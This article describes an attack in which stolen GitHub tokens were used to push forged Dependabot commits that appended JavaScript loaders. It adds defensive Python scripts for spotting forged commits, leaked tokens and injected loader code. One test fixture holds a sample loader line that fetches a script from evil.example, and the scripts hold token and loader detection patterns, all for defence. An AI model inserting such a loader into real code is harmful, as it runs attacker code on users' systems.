Malicious Code Updates Target GitHub Repositories in Software Supply Chain Attack
Overview
In a recent software supply chain attack, threat actors used stolen GitHub personal access tokens (PATs) to push malicious commits to hundreds of GitHub repositories. The commits were labelled as the work of Dependabot, a tool developers are used to seeing in their project history, so that the changes would pass without scrutiny. The malicious commits appended code to JavaScript files that, when run, loaded and executed further code from a site the attackers controlled. The campaign stands out for impersonating a trusted automation rather than a human contributor, and it raises the question of how much trust developers place in the author shown on a commit.
Impersonation and Deception
The attackers deliberately targeted GitHub repositories, capitalizing on the trust associated with Dependabot. Dependabot is a dependency-update tool acquired by GitHub in 2019; it opens automated pull requests that bump dependencies and patch known vulnerabilities in projects hosted on the platform. Because git lets a committer set any author name it likes, the attackers could make their commits appear to come from Dependabot and use the stolen PATs to push them directly. The aim was to slip past developers who tend to wave Dependabot's changes through without close review.
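A maintainer can apply the same skepticism mechanically. The script below is an added example, not code from the original article or from GitHub: it reads `git log` output and flags any commit whose author name claims to be Dependabot but whose author address is not the noreply address GitHub assigns to the Dependabot app, or which carries no valid signature (genuine Dependabot commits are signed by GitHub and show as "Verified"). The address constant and the sample log are constructed for the example; confirm the address against a known-good Dependabot commit in your own history before relying on it.

```python
"""Flag commits whose author claims to be Dependabot but which lack what a
genuine Dependabot commit carries. Added example, not from the original
article or from GitHub."""
from __future__ import annotations
import re
import sys
from dataclasses import dataclass

# Git lets anyone set the author name, so the name proves nothing. A genuine
# Dependabot commit is authored with the noreply address GitHub assigns to
# the Dependabot app and is signed by GitHub ("Verified" in the web UI).
# Assumption: confirm this address against a known-good Dependabot commit.
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"
CLAIMS_BOT = re.compile(r"dependabot", re.IGNORECASE)
# Values of git's %G? placeholder that mean a valid signature was found.
SIGNED_OK = {"G", "U"}   # G = good, U = good but signing key not trusted locally


@dataclass
class Commit:
    sha: str
    author_name: str
    author_email: str
    sig_status: str      # %G?: G, U, N (unsigned), B (bad), E (cannot verify)
    subject: str


def parse_log(text: str) -> list[Commit]:
    """Parse output of: git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'"""
    commits = []
    for line in text.splitlines():
        if line.strip():
            sha, name, email, sig, subject = line.split("\x1f", 4)
            commits.append(Commit(sha, name, email, sig, subject))
    return commits


def suspicious_commits(text: str, expected_email: str = DEPENDABOT_EMAIL) -> dict[str, list[str]]:
    """Map sha -> reasons for every commit that claims to be Dependabot but
    either uses a different author address or carries no valid signature."""
    findings: dict[str, list[str]] = {}
    for c in parse_log(text):
        if not CLAIMS_BOT.search(c.author_name):
            continue
        reasons = []
        if c.author_email.lower() != expected_email.lower():
            reasons.append(f"author address {c.author_email} is not the Dependabot address")
        if c.sig_status not in SIGNED_OK:
            reasons.append(f"no valid signature (git status {c.sig_status})")
        if reasons:
            findings[c.sha] = reasons
    return findings


# Constructed sample log (the SHAs are placeholders). Commit 1 is what a real
# Dependabot commit looks like; 2 and 3 carry a forged author name.
SAMPLE_LOG = "\n".join([
    "1111aaaa\x1fdependabot[bot]\x1f" + DEPENDABOT_EMAIL + "\x1fG\x1fBump lodash from 4.17.20 to 4.17.21",
    "2222bbbb\x1fdependabot[bot]\x1f" + DEPENDABOT_EMAIL + "\x1fN\x1ffix",
    "3333cccc\x1fdependabot[bot]\x1fdependabot@example.com\x1fN\x1ffix",
    "4444dddd\x1fAlice Dev\x1falice@example.com\x1fN\x1fAdd retry logic",
])

if __name__ == "__main__":
    # Pass "-" to read a real git log from stdin; otherwise run on the sample.
    text = sys.stdin.read() if sys.argv[1:] == ["-"] else SAMPLE_LOG
    for sha, reasons in suspicious_commits(text).items():
        print(sha, "->", "; ".join(reasons))
```

To run it against a real repository: `git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s' | python check_dependabot.py -`. Import GitHub's web-flow signing key first (https://github.com/web-flow.gpg); without it git reports status `E` for every GitHub-signed commit and the check will flag genuine Dependabot commits too.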
Because the attack relied on stolen PATs rather than on a flaw in the platform, GitHub has emphasized that its systems were not compromised and that there is no evidence GitHub users are at immediate risk. The episode nonetheless shows why developers need to secure their accounts and apply the principle of least privilege to the tokens they create, so that a single stolen token cannot write to every repository its owner can reach.
Protecting Software Development Pipelines
To safeguard their software development pipelines against similar attacks, developers should prioritize hardening their accounts and systems. GitHub already scans all public repositories for leaked developer secrets, such as passwords and access tokens, and has mandated two-factor authentication for all users who contribute code on the platform. These measures alone are not sufficient, however: a PAT is used in place of an interactive login, so two-factor authentication does not stop someone who already holds the token, and secret scanning only helps once a token has been committed to a public repository.
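Developers do not have to wait for GitHub's scanner to find a token after it has been pushed. The script below is an added example, not GitHub's secret-scanning code: it searches text for GitHub's published token formats (classic `ghp_` tokens and fine-grained `github_pat_` tokens among them), skips obvious placeholders, and reports each hit with the token masked, so it can be run over staged changes before a commit leaves the machine. The sample input and the token values in it are constructed for the example.

```python
"""Find GitHub tokens in text before it is committed. Added example, not
GitHub's secret-scanning code."""
from __future__ import annotations
import re
import sys

# GitHub's published token prefixes. Classic PATs are ghp_ followed by 36
# base62 characters; fine-grained PATs are github_pat_ followed by 22
# characters, an underscore and 59 more.
TOKEN_PATTERNS = {
    "classic PAT": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "OAuth access token": re.compile(r"\bgho_[A-Za-z0-9]{36}\b"),
    "GitHub App token": re.compile(r"\bgh[usr]_[A-Za-z0-9]{36}\b"),
    "fine-grained PAT": re.compile(r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
}
# Documentation often shows tokens with the secret part blanked out.
PLACEHOLDER = re.compile(r"x{6,}|REDACTED|EXAMPLE", re.IGNORECASE)


def mask(token: str) -> str:
    """Keep enough of the token to identify it without reprinting the secret."""
    return token[:8] + "..." + token[-4:]


def find_tokens(text: str) -> list[dict]:
    """Return one record per token-shaped string, with line number and kind."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in TOKEN_PATTERNS.items():
            for m in pat.finditer(line):
                tok = m.group(0)
                if PLACEHOLDER.search(tok):
                    continue
                hits.append({"line": lineno, "kind": kind, "token": mask(tok)})
    return hits


# Constructed sample: two real-shaped tokens and one documentation placeholder.
# The token values are made up and have the right length but are not valid.
CLASSIC = "ghp_" + "A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8"           # 4 + 36 chars
FINE_GRAINED = "github_pat_" + "aB1" * 7 + "c" + "_" + "zYxW" * 14 + "vUt"  # 22 + 1 + 59
SAMPLE = (
    f".env: GITHUB_TOKEN={CLASSIC}\n"
    f"README: export GITHUB_TOKEN=ghp_{'x' * 36}\n"
    f"ci.yml: token: {FINE_GRAINED}\n"
    "notes.txt: nothing here\n"
)

if __name__ == "__main__":
    # "-" reads stdin (e.g. git diff --cached), paths read files, none runs the sample.
    args = sys.argv[1:]
    if args == ["-"]:
        data = sys.stdin.read()
    elif args:
        data = "".join(open(p, encoding="utf-8", errors="replace").read() for p in args)
    else:
        data = SAMPLE
    found = find_tokens(data)
    for h in found:
        print(f"line {h['line']}: {h['kind']} {h['token']}")
    sys.exit(1 if found else 0)
```

Wired into a pre-commit hook as `git diff --cached -U0 | python scan_tokens.py -`, a non-zero exit blocks the commit. The check is pattern-based, so it catches the formats listed and nothing else; a token pasted into a file under a different encoding, or a credential for another service, needs its own pattern.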
When judging whether a project can be trusted, developers should not rely solely on attributes such as the number of contributors or commits. Researchers have shown that the signals and metadata used to assess trustworthiness can be forged, which can lead to malicious code being distributed unwittingly. Companies should adopt additional detective measures, such as honey tokens: fake credentials planted throughout development environments that serve no legitimate purpose, so that any attempt to use one is a reliable sign of illegitimate access.
Furthermore, developers should examine the code in the packages they use, and the changes made to their own repositories, to catch malicious code inserted into the supply chain. This calls for robust code review of every commit, regardless of who it appears to come from, and continuous monitoring of dependencies.
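The commits in this campaign appended a loader to existing JavaScript files, so the newly added lines are where a reviewer should look. The script below is an added example, not code from the original article or from any project: it diffs the old and new contents of a file, isolates the added lines, and flags those that create a script element, assign a remote URL to `src`, fetch from a URL, or evaluate decoded data, unless every URL on the line points at an allow-listed first-party host. The sample files and the hosts evil.example and cdn.example.org are constructed for the example.

```python
"""Flag added JavaScript that pulls in or evaluates code at runtime.
Added example, not code from the original article or from any project."""
from __future__ import annotations
import difflib
import re

# Indicators that a line fetches or evaluates code at runtime. An attacker who
# appends a loader to an existing file needs something like one of these.
LOADER_PATTERNS = {
    "dynamic script tag": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "remote src assignment": re.compile(r"\.src\s*=\s*['\"]https?://"),
    "fetch of remote resource": re.compile(r"\bfetch\(\s*['\"]https?://"),
    "eval / Function constructor": re.compile(r"\beval\(|\bnew\s+Function\("),
    "base64 decode": re.compile(r"\batob\("),
}
URL_HOST = re.compile(r"https?://([^/'\"\s:?#]+)")


def added_lines(before: str, after: str) -> list[tuple[int, str]]:
    """Return (line number, text) for lines present in `after` but not in
    `before`, i.e. what the change introduced."""
    old, new = before.splitlines(), after.splitlines()
    matcher = difflib.SequenceMatcher(None, old, new, autojunk=False)
    added = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            added.extend((j + 1, new[j]) for j in range(j1, j2))
    return added


def scan_change(before: str, after: str, allowed_hosts: frozenset[str] = frozenset()) -> list[dict]:
    """Report added lines that load or evaluate code, unless every URL on the
    line points at an allow-listed first-party host."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for lineno, line in added_lines(before, after):
        reasons = [name for name, pat in LOADER_PATTERNS.items() if pat.search(line)]
        if not reasons:
            continue
        hosts = {h.lower() for h in URL_HOST.findall(line)}
        foreign = sorted(hosts - allowed)
        # A loader with no URL at all (eval of decoded data) is still suspicious.
        if foreign or not hosts:
            findings.append({"line": lineno, "reasons": reasons, "hosts": foreign})
    return findings


# Constructed sample: a small module and three versions of its new state.
BEFORE_JS = (
    "function greet(name) {\n"
    "  return 'Hello, ' + name;\n"
    "}\n"
    "module.exports = { greet };\n"
)
AFTER_MALICIOUS = BEFORE_JS + (
    "(function(){var s=document.createElement('script');"
    "s.src='https://evil.example/l.js';document.head.appendChild(s);})();\n"
)
AFTER_BENIGN = BEFORE_JS + "module.exports.version = '1.0.1';\n"
AFTER_ALLOWED = BEFORE_JS + (
    "var s=document.createElement('script');s.src='https://cdn.example.org/lib.js';\n"
)

if __name__ == "__main__":
    for f in scan_change(BEFORE_JS, AFTER_MALICIOUS):
        print(f"line {f['line']}: {', '.join(f['reasons'])}; hosts {f['hosts']}")
```

In a CI job the `before` and `after` contents come from `git show <base>:<path>` and the checked-out file. The patterns are heuristics, so an obfuscated loader that builds its strings at runtime can evade them; the allow-list keeps legitimate first-party script loading from drowning out the signal.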
Recommendations and Conclusion
Both GitHub and developers must take proactive steps to secure software supply chains. GitHub should give every user access to logs of how their tokens are used, a capability the article notes is currently limited to enterprise customers. That would let users trace suspicious activity and revoke a compromised token promptly.
Developers should prioritize securing their accounts by adopting fine-grained personal access tokens, which can be limited to specific repositories and permissions, instead of classic tokens that grant broad access to everything the account can reach. A holistic approach to security is essential, combining code analysis, regular vulnerability checks, and continuous monitoring of package dependencies.
Software supply chain attacks like this one show how threats keep evolving and why constant vigilance is needed. Strong security practices, from token hygiene to reviewing every commit on its merits, are what keep malicious code out of widely used repositories, preserve the integrity of the code, and protect the users who depend on it.